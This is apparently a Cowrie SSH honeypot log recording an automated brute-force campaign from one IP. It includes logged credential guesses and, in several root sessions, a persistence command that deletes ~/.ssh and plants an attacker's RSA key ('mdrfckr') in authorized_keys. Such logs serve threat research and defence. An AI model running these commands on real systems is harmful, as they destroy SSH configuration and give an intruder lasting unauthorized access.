{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:06.792560Z","src_ip":"212.227.235.229","session":"b8386484ae84"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:00:08.178246Z","src_ip":"212.227.235.229","session":"b8386484ae84"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:08.509282Z","src_ip":"212.227.235.229","session":"b8386484ae84"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:08.526859Z","src_ip":"212.227.235.229","session":"23c976c239cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53012,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f9cfd492a01","protocol":"ssh","message":"New connection: 212.227.235.229:53012 (1.2.3.4:22) [session: 5f9cfd492a01]","sensor":"my-vps","timestamp":"2025-09-08T22:00:24.205152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:24.205798Z","src_ip":"212.227.235.229","session":"5f9cfd492a01"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:24.516396Z","src_ip":"212.227.235.229","session":"5f9cfd492a01"}
{"eventid":"cowrie.login.failed","username":"samsung","password":"Password123","message":"login attempt [samsung/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:00:25.796843Z","src_ip":"212.227.235.229","session":"5f9cfd492a01"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:27.108920Z","src_ip":"212.227.235.229","session":"5f9cfd492a01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47874,"dst_ip":"1.2.3.4","dst_port":22,"session":"263b40fab197","protocol":"ssh","message":"New connection: 212.227.235.229:47874 (1.2.3.4:22) [session: 263b40fab197]","sensor":"my-vps","timestamp":"2025-09-08T22:00:29.548449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:29.549617Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34262,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0190710073","protocol":"ssh","message":"New connection: 212.227.235.229:34262 (1.2.3.4:22) [session: 0e0190710073]","sensor":"my-vps","timestamp":"2025-09-08T22:00:32.431777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:32.477767Z","src_ip":"212.227.235.229","session":"0e0190710073"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:32.753140Z","src_ip":"212.227.235.229","session":"0e0190710073"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:32.812298Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.login.success","username":"root","password":"a@12","message":"login attempt [root/a@12] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:00:33.566869Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"1234567","message":"login attempt [usertest/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T22:00:33.775462Z","src_ip":"212.227.235.229","session":"0e0190710073"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:00:34.093240Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:00:34.093930Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:00:34.094891Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:34.982445Z","src_ip":"212.227.235.229","session":"0e0190710073"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:35.173688Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:00:35.508926Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:00:35.509713Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:00:35.763749Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:35.764741Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39306,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b5c63dab64e","protocol":"ssh","message":"New connection: 212.227.235.229:39306 (1.2.3.4:22) [session: 7b5c63dab64e]","sensor":"my-vps","timestamp":"2025-09-08T22:00:37.027728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:37.028563Z","src_ip":"212.227.235.229","session":"7b5c63dab64e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:38.242893Z","src_ip":"212.227.235.229","session":"7b5c63dab64e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:00:39.655692Z","src_ip":"212.227.235.229","session":"7b5c63dab64e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:40.909045Z","src_ip":"212.227.235.229","session":"7b5c63dab64e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39320,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e4235ca1f89","protocol":"ssh","message":"New connection: 212.227.235.229:39320 (1.2.3.4:22) [session: 9e4235ca1f89]","sensor":"my-vps","timestamp":"2025-09-08T22:00:41.162574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:41.163435Z","src_ip":"212.227.235.229","session":"9e4235ca1f89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38416,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ec99bdf6662","protocol":"ssh","message":"New connection: 212.227.235.229:38416 (1.2.3.4:22) [session: 0ec99bdf6662]","sensor":"my-vps","timestamp":"2025-09-08T22:00:42.355930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:42.357111Z","src_ip":"212.227.235.229","session":"0ec99bdf6662"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:42.402961Z","src_ip":"212.227.235.229","session":"9e4235ca1f89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:42.671714Z","src_ip":"212.227.235.229","session":"0ec99bdf6662"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:00:43.812748Z","src_ip":"212.227.235.229","session":"9e4235ca1f89"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"12345678","message":"login attempt [raspberry/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T22:00:43.968242Z","src_ip":"212.227.235.229","session":"0ec99bdf6662"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:44.063020Z","src_ip":"212.227.235.229","session":"9e4235ca1f89"}
{"eventid":"cowrie.session.closed","duration":"14.5","message":"Connection lost after 14.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:44.063959Z","src_ip":"212.227.235.229","session":"263b40fab197"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:00:45.283264Z","src_ip":"212.227.235.229","session":"0ec99bdf6662"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33622,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a431d2a4660","protocol":"ssh","message":"New connection: 212.227.235.229:33622 (1.2.3.4:22) [session: 8a431d2a4660]","sensor":"my-vps","timestamp":"2025-09-08T22:00:59.214142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:00:59.214808Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:00:59.385795Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.login.success","username":"root","password":"terminal12!","message":"login attempt [root/terminal12!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:01:00.071646Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:01:00.434964Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:01:00.435774Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:01:00.436850Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:01:00.610573Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:01:01.084884Z","src_ip":"212.227.235.229","session":"8a431d2a4660"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 